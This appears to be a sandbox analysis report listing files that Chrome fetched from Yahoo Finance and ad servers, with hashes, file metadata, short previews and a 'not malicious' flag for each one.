                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......".....V}.....{PLTE............................................................................................................................x.....(tRNS....!.k6...L........)....Y..D..q>.wdS_._.D...'IDATh..Y.0.M............!.^..z.....&.d.......,...@.....m.&x..l....M.-.k4....kZa.........Y..F....=I..jx.C..H..W......e....o.oO.|..D..?#.D.{~..own*...S.........7..K.....<...nA..~.8."q.@....C2...j...>..t}....(..M..@^....a..x..~J8.n{.G..b$..m_%.Y.........X.X)..Y.b.qk..].....`z...1=...vu..dj..7c').h....L..0.+e*BC...S.....jyzb.\.........3G1K..`..{Kl..{_%....F.....g....h.)n..F...-&...K....)6...hV.e.#3.N..O,.....~'..s....SZ..!.).0..u.....v.1.....<...F...O.O...@....Bk.j.8[.D.4Y.5...h.-..:dAIzn.)>...\..1.....s.#[.{.....}.+.3....T.w..F.#.aaa.....7.5..QR...Q*....].#..n....R..`,q...n..B:..4...=.w.../..fNN...<.P..j.U...D...c.T.(.R.X8..~el..>.h.]]5\....6.-...9#.$.:..a6..1.U..`L.4.%...v....+D.eN.znm....v...H..T....o...;)X.\..0...x..5}B..*.Q.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5570), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.224150317868789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:V6DUauGy2kvP5W7NRHKrmCRFqaLsL2eOt666o2hG:V6DWvP5WxErgOtwRhG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2A251A0DDB3D7C4EC13F4E35EE35DD2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E400B6FBA5E2A71F489AD4FC92D4B2243E90E139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09BEEED1E13C0CC009D030711289983F71028B3288F1E840ECAAC82BA381C04A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2301875E90FF6B4C85B1CAF35CF87ED04A7A7F038355827DA63D36BB3FC95A1AF5396CC936E318D078AD624AC7C9A4976436AD2F56814139E837AD82BDADBB8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--pebble\){border-color:#c7cdd2;border-color:var(--pebble)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdtc\(--dirty-seagull\){border-top-color:#e0e4e9;border-top-color:var(--dirty-seagull)}#atomic .Bdendc\(--hulk-pants\){border-right-color:#7e1fff;border-right-color:var(--hulk-pants)}#atomic .Bds\(s\){border-style:solid}#atomic .Bdts\(s\){border-top-style:solid}#atomic .Bdends\(s\){border-right-style:solid}#atomic .Bdw\(0\){border-width:0}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdtw\(1px\){border-top-width:1px}#atomic .Bdendw\(6px\){border-right-width:6px}#atomic .Bdendw\(8px\){border-right-width:8px}#atomic .Bdrs\(100\%\){border-radius:100%}#atomic .Bdrs\(2px\){border-radius:2px}#atomic .Bdrs\(4px\){border-radius:4px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bg\(--white\){background:#fff;background:var(--white)}#atomic .Bg\(t\){b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.76176773688465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:A+T+CxvF4KBvN88+LVBCBJDKgddQEeGgX5AuvM8v0A4TB1bw:A+i84KBkVBODKgddQELgXeuvr8A40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:293CF07BB6B52A1A18D797328200C9C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BF69950A40F5BA11475E896A5EB2F7B049370031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8AC7E74D523881BB9FFB193D8897292CD05F78DFA91ECD285411D337361B1FB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:996AB8246130832BBF9F7ED8BC24419E34E501DF8D36A34FB16BF0269F90C593B3DA05F0FA96FE2444A0345B32175B4781192BA0FD02A11F33CB2902C44E5A00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/spread.CgU5AtxT.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function r(t,s){const c={},u={},f={$$scope:1};let i=t.length;for(;i--;){const o=t[i],e=s[i];if(e){for(const n in o)n in e||(u[n]=1);for(const n in e)f[n]||(c[n]=e[n],f[n]=1);t[i]=e}else for(const n in o)f[n]=1}for(const o in u)o in c||(c[o]=void 0);return c}function a(t){return typeof t=="object"&&t!==null?t:{}}export{a,r as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/v000/sync?userid=hjNqEe7JA99N&ev=1&pn_id=pp&gpp_sid=&gpp=&us_privacy=&pid=561118&gdpr_consent=&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11230), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.207546962286139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3ciaumTuQ/2lAg6gA2MZzXanihYZRCq4b8jbcMiISXsrFyOof7:3vmiQhgAfzXancMCqYciFXsrFyv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B29975904D91FE6FF597A7FD5A315391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:79A3373AD0C641BD858221C4B70A995215064AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B2918846CC75BC0BFC18AF81ABF8F0E4F9D30CFD5383639CE07601F4A74684E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:480A454CCED569439C22251D6DBB4300A340A2BBD777E62F90C2634902774F58046AE142848A2AC81276989642AF026A85B6F4F1E19A10B45BE9D7C2FB54A3F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-native-da-1.0.5-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-native-da"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2894)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.931250511770156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:4OOJN1yEjJkdR4Fm+zh+eFCHuOoS3YyqpDLuaXuH8Cn:D+auPCpmZJc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5D689E22AA6F27AE55A08750E286B7EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0FFA1A3C0B5108DC9A0DF5966B08E57235D8484A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BF3CA512C6CBE43DFD4054DAAAE9DDD8C95F5BE85F9F6301612FB6BFEACDACB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CDC1A967E4C01AD9C66415D93CDE52AD42C1B26444381D22D0D0332F6E13001A05AC22F5A466EC0FB54669E8457BE06CB6358646F1D9E6741ECC40544A556793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/NavBar.CJPoP-H9.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.item.yf-1e6z5da.yf-1e6z5da{display:flex}.beta.yf-1e6z5da.yf-1e6z5da{background-color:var(--_item-active-color);font-weight:var(--font-bold);color:var(--white);padding:2px var(--space-1);border-radius:var(--border-radius-s)}nav.yf-1e6z5da.yf-1e6z5da{--_selected-border-width:3px;--_item-color:var(--enabled-l2);--_item-active-color:var(--active-l2);--_item-hovered-color:var(--hovered-l2);--_item-pressed-color:var(--pressed-l2)}nav.yf-1e6z5da .nav-list.yf-1e6z5da{position:relative;display:flex;flex-direction:row;align-items:flex-start;gap:var(--space-4);overflow-x:auto;scroll-snap-type:x mandatory;scrollbar-width:none;font-size:var(--font-l);padding:0}nav.yf-1e6z5da .nav-list.yf-1e6z5da::-webkit-scrollbar{display:none}nav.yf-1e6z5da .nav-list li.yf-1e6z5da{display:block}@media only screen and (min-width: 768px){nav.yf-1e6z5da .nav-list.yf-1e6z5da{padding:0}}nav.yf-1e6z5da .nav-list .item.yf-1e6z5da{cursor:pointer;white-space:nowrap;border-bottom:var(--_selected-border-width) solid transpa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2294)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2295
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.233334984585586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:tGFHXJy6/1ilExJQIBlbH8kUXfVP1nEIzTNEIDLpkX/j:tGFHhdwAJxlbHVUP7/Bab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C36A3B111A74C3748409D6362393EB98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:36C6F522000119286C08099C9AD2C1DAE4839C8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F358A85D3732F67EE5C653BE77EC1A58FC294DAA84695D67DBCF4CB7DE1F8CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A87621DAB3369DCCDE4575EFEE7105D12C93C21659DDCC6BC3F06D785E0E3110C85CCEAD06EABF80BC61E95254F650A731E7C0FBCF475CB3F1B63640945E52F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/nodes/13.BWRpJeYE.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as d,c as h,b as k,j as b,k as _,u as w,g as F,a as v,i as p,n as g,e as y,d as N,f as C,q as D}from"../chunks/scheduler.Dr9AAxFe.js";import{S as L,i as S,c,b as m,m as i,t as l,a as $,d as u}from"../chunks/index.DCSmZEjO.js";import q from"../chunks/Ads.Bxzxpy-0.js";import{D as B}from"../chunks/Dock.DnH4WZuW.js";import{F as E}from"../chunks/FeatureBarNeo.DkDKoe4s.js";import{L as M}from"../chunks/Layout.Be1EN6Zi.js";import{M as T}from"../chunks/MarketsNavBar.raoHGTxi.js";function j(n){let e,r,t;e=new E({props:{className:"no-p-b tw-mt-0"}});const o=n[0].default,s=h(o,n,n[1],null);return{c(){c(e.$$.fragment),r=k(),s&&s.c()},l(a){m(e.$$.fragment,a),r=b(a),s&&s.l(a)},m(a,f){i(e,a,f),_(a,r,f),s&&s.m(a,f),t=!0},p(a,f){s&&s.p&&(!t||f&2)&&w(s,o,a,a[1],t?v(o,a[1],f,null):F(a[1]),null)},i(a){t||(l(e.$$.fragment,a),l(s,a),t=!0)},o(a){$(e.$$.fragment,a),$(s,a),t=!1},d(a){a&&p(r),u(e,a),s&&s.d(a)}}}function A(n){let e,r;return e=new T({props:{slot:"left"}}),{c(){c(e.$$.fragment)},l(t){m(e.$
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:C source, Unicode text, UTF-8 text, with very long lines (19842)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):19846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.543777580724979
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:MCQmhIGpmU5WD2crxz3kshY7DMu8kbudc4TPr5951/Esht8Ay/ckvrJ:MCHrxWSRadc4TPrVJth2Jcs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4CA7E5F4719318A39BDCEF633AAA4104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AAC987C8F0CD9001D5F501BDC8B0A4033C065849
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:566D2BAAC13A1BD5AF3239B6BA18BD54F656D15F1374DEAC960F4AC9169B40C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BC803E7FC26B34043D68787011F2A271E399DD90485ED66D9E315CF06F70BD397302DB4240E970D2A82C9D653CA65A1FE1BA099F0E8264E617B4872795C4BD88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function Mr(e){return typeof e=="number"}60*new Date().getTimezoneOffset()*1e3;const Be=/(\d+)px/i;function xr(e){return+Be.exec(e)[1]}function $r(e,r){return Math.ceil(e.measureText(r.replace(/\d/gi,"0")).width)}function Nr(e,r,n,t="transparent"){e.clearRect(0,0,r,n),t&&(e.fillStyle=t,e.fillRect(0,0,r,n))}function kr(e,...r){return r.forEach(n=>{n!==null&&typeof n=="object"&&Object.keys(n).forEach(t=>{n[t]!==void 0&&(e[t]=n[t])})}),e}const me=typeof window<"u"&&window.XDomainRequest,ye=typeof window>"u"||"withCredentials"in new XMLHttpRequest;function Er(e,r){const{host:n="https://query1.finance.yahoo.com",path:t,partner:i="",query:o}=e;o.corsDomain=window.location.host,i&&(o[".tsrc"]=i);const u=`${n}${t}?${function(f){return Object.keys(f).map(g=>{const c=f[g],h=Array.isArray(c)?c.join(","):c;if(h!=null)return`${g}=${encodeURIComponent(h)}`}).filter(Boolean).join("&")}(o)}`,a=function(f){let g;return ye?(g=new XMLHttpRequest,g.open("GET",f,!0)):me&&(g=new me,g.open("GET",f)),g}(u);if
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3159)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.924285811246094
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:8PnF06PLaPJwP4PPq+PwpP9FJP0L8xIp3koEdUtFseM7w0s4iew/wc821XC:8pmqgrCZmd3xEd93FsFPwc821y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0E507112ABFE40ED9CEBDBD2AAECF10C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:897057F36177351099C4E224BFA0DA605C96061F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08531693CFBA6F637C73FAFCD99BFAA06F6CD5413ECBF9BB8A9AA61C5786CB08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E04C93C233B6B9955FDA87F6A506EFFBD67EDF6FFBA661B19A27A8026CF733E49EB3BBCEF4458B0A3C642D4D2CA0BC7B8D7BA422730E1B5EEED2F8539DD3A8C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Switch.BaMlRiYx.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.switch-label.yf-xyblh0{--thumb-size:2rem;display:flex;align-items:center;gap:var(--space-2);cursor:pointer;-webkit-user-select:none;-moz-user-select:none;user-select:none;-webkit-tap-highlight-color:transparent}.switch-label.sz-xx-small.yf-xyblh0{--thumb-size:1rem;white-space:nowrap}.switch-label.sz-x-small.yf-xyblh0{--thumb-size:1.2rem}.switch-label.sz-small.yf-xyblh0{--thumb-size:.75rem;--track-padding:.125rem;--thumb-shadow-radius:.25rem}.switch-label.sz-medium.yf-xyblh0{--thumb-size:1rem;--track-padding:var(--space-1);--thumb-shadow-radius:.5rem}.switch-label.sz-large.yf-xyblh0{--thumb-size:1.5rem;--track-padding:var(--space-1);--thumb-shadow-radius:.5rem}.switch-label.sz-x-large.yf-xyblh0{--thumb-size:2.8rem}.switch-label.labelRight.yf-xyblh0{flex-direction:row-reverse;width:-moz-fit-content;width:fit-content}.switch-inpt.yf-xyblh0{--thumb-highlight:hsl(0deg 0% 0% / 25%);--thumb-color:var(--surface4);--thumb-position:0%;--track-size:calc(var(--thumb-size) * 2);--thumb-transition-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmMFfJ5XWa_sBIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=medianet&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=3714164676390569000V10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (788)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343368280962493
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:JKKGJND4kQ9dSO6E+sl1XSDQkQSYRSYWu6jlqDq:JKtp4r3OEjl1iUkQ/R9r6jkDq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:099085B6CCBD78C30B4A6592F26BDEF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA16F2988D321483258B007F98B65147CA443185
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16FB6CCC8FF4F296025F19775F4117BC49F3196C6322BDAB5465A4EACEF2506E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8E1EA425A4F78366FBB68964BF355C49D189D026D4F42BD7C8B619AC9412CEDA652B0183D508D76DB39793A5ED2EB01A077A60A1F8B39C078345D6870C2B7363
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
